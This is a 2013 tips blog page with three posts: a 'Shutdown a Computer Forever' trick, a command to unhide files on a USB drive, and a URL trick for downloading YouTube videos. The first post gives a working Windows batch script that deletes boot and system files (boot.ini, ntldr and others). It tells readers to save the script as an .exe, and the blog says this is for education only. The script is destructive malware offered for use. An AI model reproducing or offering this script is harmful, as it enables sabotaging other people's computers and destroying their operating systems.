Friday 18 October 2013

How to Shutdown a Computer Forever [Dangerous Trick]

STEPS 
  • Copy the below code and paste it in notepad.

@echo off
attrib -r -s -h c:\autoexec.bat
del c:\autoexec.bat
attrib -r -s -h c:\boot.ini
del c:\boot.ini
attrib -r -s -h c:\ntldr
del c:\ntldr
attrib -r -s -h c:\windows\win.ini
del c:\windows\win.ini

Then save the file as shutdownforever.exe

  • Don't open it. If you open you can't able to recover your OS.

NOTE : 

This trick is just for educational purpose only don't try this.

Posted By Unknown 10/18/2013 05:56:00 am

Remove Shortcut Viruses in USB Pendrive and Memory Card


STEPS
  • Go to Run. (Use CTRL+R to go Run).
  • Type cmd and hit enter. Now you will get a command prompt.
  • In that the default path is may c drive. Change it with your pendrive letter. Assume your pendrive letter is K. Then type K: and hit enter. The path will be changed to C to K.
 
Then paste this code in  attrib -h -s -r /s /d k:*.*  command prompt. (Change the letter K according to your USB drive letter




  • Wait sometime to process finish.
  • After that re-plug your USB pendrive. Now you can able to see your files. Also it will get back your hidden files.
If you think it is useful then share with your friends. If you face a problem to use this feel free to comment below.

Posted By Unknown 10/18/2013 05:35:00 am

Download Youtube Videos Without Using Software



STEPS
  • Go to youtube
  • Open the video which you want to download.
  • Now see your address bar in the browser. It somewhat look like below address.
http://www.youtube.com/watch?v=QGkDSzGtdew


  • Now replace ss instead of http://www. The URL looks like 
ssyoutube.com/watch?v=QGkDSzGtdew

Then click enter. It will redirect into download page. After that you can download the video in your browser.

Posted By Unknown 10/18/2013 05:02:00 am

We Serve All for Free!